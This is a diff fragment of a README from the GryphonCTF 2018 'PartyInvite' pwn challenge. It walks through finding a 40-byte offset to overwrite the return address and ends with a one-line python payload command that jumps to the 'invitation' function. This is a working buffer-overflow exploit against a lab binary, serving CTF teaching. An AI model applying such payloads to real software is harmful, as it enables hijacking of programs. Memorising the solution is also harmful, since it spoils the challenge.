SPGryphons/GryphonCTF2018-Lite-Challenges/challenges/pwn/PartyInvite/README.md

 1a1b1c37:	c3                   	retq
 ```
 3. The third line tells us 32 bytes is reserved for a variable.
-4. Understand that the next 8 bytes stores the `%rbp`.
+4. They would also need to know that the next 8 bytes stores the `%rbp`.
 5. Derive that one needs to write 40 bytes of garbage before one can overwrite the return address for the `check` function.
-5. Also derive address of `invitation` function is `1a1b1c1d`.
+5. Also derive that the address of `invitation` function is `1a1b1c1d`.

 Final command to exploit local program assuming machine uses little-endian:
 `python -c 'print "a" * 40 + "\x1d\x1c\x1b\x1a"' | ./AwesomeParty`